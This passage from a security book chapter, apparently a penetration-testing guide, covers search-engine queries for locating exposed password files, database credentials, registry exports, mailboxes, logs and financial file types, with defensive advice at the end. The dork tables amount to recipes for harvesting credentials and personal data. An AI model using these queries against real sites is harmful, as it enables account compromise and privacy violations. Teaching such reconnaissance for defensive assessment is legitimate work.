intitle:”Index of” pwd.db UNIX /etc/pwd.db credentials
intitle:Index.of etc shadow UNIX /etc/shadow user credentials
intitle:index.of master.passwd UNIX master.passwd user credentials
intitle:”Index of” spwd.db UNIX spwd.db credentials
passwd -pam.conf
filetype:bak inurl:”htaccess UNIX various password file backups
passwdshadowhtusers
filetype:inc dbconn Various database credentials
filetype:inc intext:mysql_ Various database credentials, server names
connect
filetype:properties inurl:db Various database credentials, server names
intext:password
inurl:vtund.conf intext:pass –cvs Virtual Tunnel Daemon passwords
inurl:”wvdial.conf” intext: wdial dialup user credentials

Queries That Locate Password Information
Query Description
filetype:mdb wwforum Web Wiz Forums Web credentials
“AutoCreate=TRUE password=*”Website Access Analyzer user passwords
filetype:pwl pwl Windows Password List user credentials
filetype:reg reg +intext: Windows Registry Keys containing user
”defaultusername” intext: credentials
”defaultpassword”
filetype:reg reg +intext: Windows Registry Keys containing user
”internet account manager” credentials
“index of/” “ws_ftp.ini” WS_FTP FTP credentials
“parent directory”
filetype:ini ws_ftp pwd WS_FTP FTP user credentials
inurl:/wwwboard wwwboard user credentials
In most cases, passwords discovered on the Web are either encrypted or
encoded in some way. In most cases, these passwords can be fed into a password
cracker such as John the Ripper from www.openwall.com/john to produce
plaintext passwords that can be used in an attack. Figure 9.6 shows the results of
the search ext:pwd inurl:_vti_pvt inurl:(Service authors administrators), which
combines a search for some common

Exported Windows registry files often contain encrypted or encoded passwords
as well. If a user exports the Windows registry to a file and Google subsequently
crawls that file, a query like filetype:reg intext:”internet account manager”
could reveal interesting keys containing password data

ress. Note that live, exported Windows registry files are not very common, but it’s
not uncommon for an attacker to target a site simply because of one exceptionally
insecure file. It’s also possible for a Google query to uncover cleartext passwords.
These passwords can be used as is without having to employ a
password-cracking utility. In these extreme cases, the only challenge is determining
the username as well as the host on which the password can be used. As
shown in Figure 9.8, certain queries will locate all the following information:
usernames, cleartext passwords, and the host that uses that authentication!


There is no magic query for locating passwords, but during an assessment,
remember that the simplest queries directed at a site can have amazing results, as
we discussed in , Chapter 7, Ten Simple Searches. For example, a query like “Your
password” forgot would locate pages that provide a forgotten password recovery
mechanism.The information from this type of query can be used to formulate
any of a number of attacks against a password. As always, effective social engineering
is a terrific nontechnical solution to “forgotten” passwords.
Another generic search for password information, intext:(password passcode
pass) intext:(username userid user), combines common words for passwords and
user IDs into one query.This query returns a lot of results, but the vast majority
of the top hits refer to pages that list forgotten password information, including
either links or contact information. Using Google’s translate feature, found at
http://translate.google.com/translate_t, we could also create multilingual password
searches.Table 9.3 lists common translations for the word password
English Translations of the Word Password
Language Word Translation
German password Kennwort
Spanish password contraseña
French password mot de passe
Italian password parola d’accesso
Portuguese password senha
Dutch password Paswoord
NOTE
The terms username and userid in most languages translate to username
and userid, respectively.
Searching for Credit Card Numbers,
Social Security Numbers, and More

Most people have heard news stories about Web hackers making off with customer
credit card information.With so many fly-by night retailers popping up
on the Internet, it’s no wonder that credit card fraud is so prolific.These momand-
pop retailers are not the only ones successfully compromised by hackers.
Corporate giants by the hundreds have had financial database compromises over
the years, victims of sometimes very technical, highly focused attackers. What
might surprise you is that it doesn’t take a rocket scientist to uncover live credit
card numbers on the Internet, thanks to search engines like Google. Everything
from credit information to banking data or supersensitive classified government
documents can be found on the Web. Consider the (highly edited) Web page

This document, found using Google, lists hundreds and hundreds of credit
card numbers (including expiration date and card validation numbers) as well as
the owners’ names, addresses, and phone numbers.This particular document also
included phone card (calling card) numbers. Notice the scroll bar on the righthand
side of Figure 9.9, an indicator that the displayed page is only a small part
of this huge document—like many other documents of its kind. In most cases,
pages that contain these numbers are not “leaked” from online retailers or ecommerce
sites but rather are most likely the fruits of a scam known as phishing,
in which users are solicited via telephone or e-mail for personal information.
Several Web sites, including MillerSmiles.co.uk, document these scams and
hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that
encourages users to update their eBay profile information.


Once a user fills out this form, all the information is sent via e-mail to the
attacker, who can use it for just about anything.
Tools and Traps
Catching Online Scammers
In some cases, you might be able to use Google to help nab the bad guys.
Phishing scams are effective because the fake page looks like an official
page. To create an official-looking page, the bad guys must have examples
to work from, meaning that they must have visited a few legitimate companies’
Web sites. If the fishing scam was created using text from several
companies’ existing pages, you can key in on specific phrases from the fake
page, creating Google queries designed to round up the servers that hosted
some of the original content. Once you’ve located the servers that contained
the pilfered text, you can work with the companies involved to
extract correlating connection data from their log files. If the scammer visited
each company’s Web page, collecting bits of realistic text, his IP should
appear in each of the log files. Auditors at SensePost (www.sensepost.com)
have successfully used this technique to nab online scam artists.
Unfortunately, if the scammer uses an exact copy of a page from only one
company, this task becomes much more difficult to accomplish.
Social Security Numbers
Social Security numbers (SSNs) and other sensitive data can be easily located
with Google as well as via the same techniques used to locate credit card numbers.
For a variety of reasons, SSNs might appear online—for example, educational
facilities are notorious for using an SSN as a student ID, then posting
grades to a public Web site with the “student ID” displayed next to the grade.A
creative attacker can do quite a bit with just an SSN, but in many cases it helps
to also have a name associated with that SSN. Again, educational facilities have
been found exposing this information via Excel spreadsheets listing student’s
names, grades, and SSNs, despite the fact that the student ID number is often
used to help protect the privacy of the student! Although we don’t feel it’s right
to go into the details of how this data is located, several media outlets have irresponsibly
posted the details online. Although the blame lies with the sites that are
leaking this information, in our opinion it’s still not right to draw attention to
how exactly the information can be located.
Personal Financial Data
In some cases, phishing scams are responsible for publicizing personal information;
in other cases, hackers attacking online retails are to blame for this breach of
privacy. Sadly, there are many instances where an individual is personally responsible
for his own lack of privacy. Such is the case with personal financial information.
With the explosion of personal computers in today’s society, users have
literally hundreds of personal finance programs to choose from. Many of these
programs create data files with specific file extensions that can be searched with
Google. It’s hard to imagine why anyone would post personal financial information
to a public Web site (which subsequently gets crawled by Google), but it
must happen quite a bit, judging by the number of hits for program files generated
by Quicken and Microsoft Money, for example. Although it would be
somewhat irresponsible to provide queries here that would unearth personal
financial data, it’s important to understand the types of data that could potentially
be uncovered by an attacker.To that end,Table 9.4 shows file extensions for various
financial, accounting, and tax return programs. Ensure that these filetypes
aren’t listed on a webserver you’re charged with protecting.
File Extension Description
afm Abassis Finance Manager
ab4 Accounting and Business File
mmw AceMoney File
Iqd AmeriCalc Mutual Fund Tax Report
et2 Electronic Tax Return Security File (Australia)
tax Intuit TurboTax Tax Return
t98-t04 Kiplinger Tax Cut File (extension based on two-digit return
year)
mny Microsoft Money 2004 Money Data Files
mbf Microsoft Money Backup Files
inv MSN Money Investor File
ptdb Peachtree Accounting Database
qbb QuickBooks Backup Files reveal financial data
qdf Quicken personal finance data
soa Sage MAS 90 accounting software
sdb Simply Accounting
stx Simply Tax Form
tmd Time and Expense Tracking
tls Timeless Time & Expense
fec U.S. Federal Campaign Expense Submission
wow Wings Accounting File
Searching for Other Juicy Info
As we’ve seen, Google can be used to locate all sorts of sensitive information. In
this section we take a look at some of the data that Google can find that’s harder
to categorize. From address books to chat log files and network vulnerability
reports, there’s no shortage of sensitive data online.Table 9.5 shows some queries
that can be used to uncover various types of sensitive data.
Query Description
intext:”Session Start AIM and IRC log files
* * * *:*:* *” filetype:log
filetype:blt blt +intext: AIM buddy lists
screenname
buddylist.blt AIM buddy lists
intitle:index.of cgiirc.config CGIIRC (Web-based IRC client) config file,
shows IRC servers and user credentials
inurl:cgiirc.config CGIIRC (Web-based IRC client) config file,
shows IRC servers and user credentials
“Index of” / “chat/logs” Chat logs
intitle:”Index Of” cookies.txt cookies.txt file reveals user information
“size”
“phone * * *” “address *” Curriculum vitae (resumes) reveal names
“e-mail” intitle:”curriculum vitae” and address information
ext:ini intext:env.ini Generic environment data
intitle:index.of inbox Generic mailbox files
“Running in Child mode” Gnutella client data and statistics
“:8080” “:3128” “:80” HTTP Proxy lists
filetype:txt
intitle:”Index of” ICQ chat logs
dbconvert.exe chats
“sets mode: +p” IRC private channel information
“sets mode: +s” IRC secret channel information
“Host Vulnerability Summary ISS vulnerability scanner reports, reveal
Report” potential vulnerabilities on hosts and
networks
“Network Vulnerability ISS vulnerability scanner reports, reveal
Assessment Report” potential vulnerabilities on hosts and networks
filetype:pot inurl:john.pot John the Ripper password cracker results
intitle:”Index Of” -inurl:maillog Maillog files reveals e-mail traffic
maillog size information
ext:mdb inurl:*.mdb inurl: Microsoft FrontPage database folders
Query Description
filetype:xls inurl:contact Microsoft Excel sheets containing contact
information.
intitle:index.of haccess.ctl Microsoft FrontPage equivalent(?)of htaccess
shows Web authentication info
ext:log “Software: Microsoft Microsoft Internet Information Services
Internet Information Services *.*” (IIS) log files
filetype:pst inurl:”outlook.pst” Microsoft Outlook e-mail and calendar
backup files
intitle:index.of mt-db-pass.cgi Movable Type default file
filetype:ctt ctt messenger MSN Messenger contact lists
“This file was generated Nessus vulnerability scanner reports, reveal
by Nessus” potential vulnerabilities on hosts and networks
inurl:”newsletter/admin/” Newsletter administration information
inurl:”newsletter/admin/” Newsletter administration information
intitle:”newsletter admin”
filetype:eml eml intext: Outlook Express e-mail files
”Subject” +From
intitle:index.of inbox dbx Outlook Express Mailbox files
intitle:index.of inbox dbx Outlook Express Mailbox files
filetype:mbx mbx intext:Subject Outlook v1–v4 or Eudora mailbox files
inurl:/public/?Cmd=contents Outlook Web Access public folders or
appointments
filetype:pdb pdb backup (Pilot Palm Pilot Hotsync database files
Pluckerdb)
“This is a Shareaza Node” Shareaza client data and statistics
inurl:/_layouts/settings Sharepoint configuration information
inurl:ssl.conf filetype:conf SSL configuration files, reveal various configuration
information
site:edu admin grades Student grades
intitle:index.of mystuff.xml Trillian user Web links
inurl:forward filetype: UNIX mail forward files reveal e-mail
forward –cvs addresses
intitle:index.of dead.letter UNIX unfinished e-mails

Summary
Make no mistake—there’s sensitive data on the Web, and Google can find it.
There’s hardly any limit to the scope of information that can be located, if only
you can figure out the right query. From usernames to passwords, credit card and
Social Security numbers, and personal financial information, it’s all out there. As a
purveyor of the “dark arts,” you can relish in the stupidity of others, but as a professional
tasked with securing a customer’s site from this dangerous form of
information leakage, you could be overwhelmed by the sheer scale of your
defensive duties.
As droll as it might sound, a solid, enforced security policy is a great way to
keep sensitive data from leaking to the Web. If users understand the risks associated
with information leakage and understand the penalties that come with violating
policy, they will be more willing to cooperate in what should be a security
partnership.
In the meantime, it certainly doesn’t hurt to understand the tactics an adversary
might employ in attacking a Web server. One thing that should become
clear as you read this book is that any attacker has an overwhelming number of
files to go after. One way to prevent dangerous Web information leakage is by
denying requests for unknown file types. Whether your Web server normally
serves up CFM,ASP, PHP, or HTML, it’s infinitely easier to manage what should
be served by the Web server instead of focusing on what should not be served.
Adjust your servers or your border protection devices to allow only specific content
or file types.
Solutions Fast Track
Searching for Usernames
_ Usernames can be found in a variety of locations.
_ In some cases, digging through documents or e-mail directories might
be required.
_ A simple query such as “your username is” can be very effective in
locating usernames.

Searching for Passwords
_ Passwords can also be found in a variety locations.
_ A query such as “Your password” forgot can locate pages that provide a
forgotten-password recovery mechanism.
_ intext:(password passcode pass) intext:(username userid user) is
another generic search for locating password information.
Searching for Credit Cards
Numbers, Social Security Numbers, and More
_ Documents containing credit card and Social Security number
information do exist and are relatively prolific.
_ Some irresponsible news outlets have revealed functional queries that
locate this information.
_ There are relatively few examples of personal financial data online, but
there is a great deal of variety.
_ In most cases, specific file extensions can be searched for.
Searching for Other Juicy Info
_ From address books and chat log files to network vulnerability reports,
there’s no shortage of sensitive data online.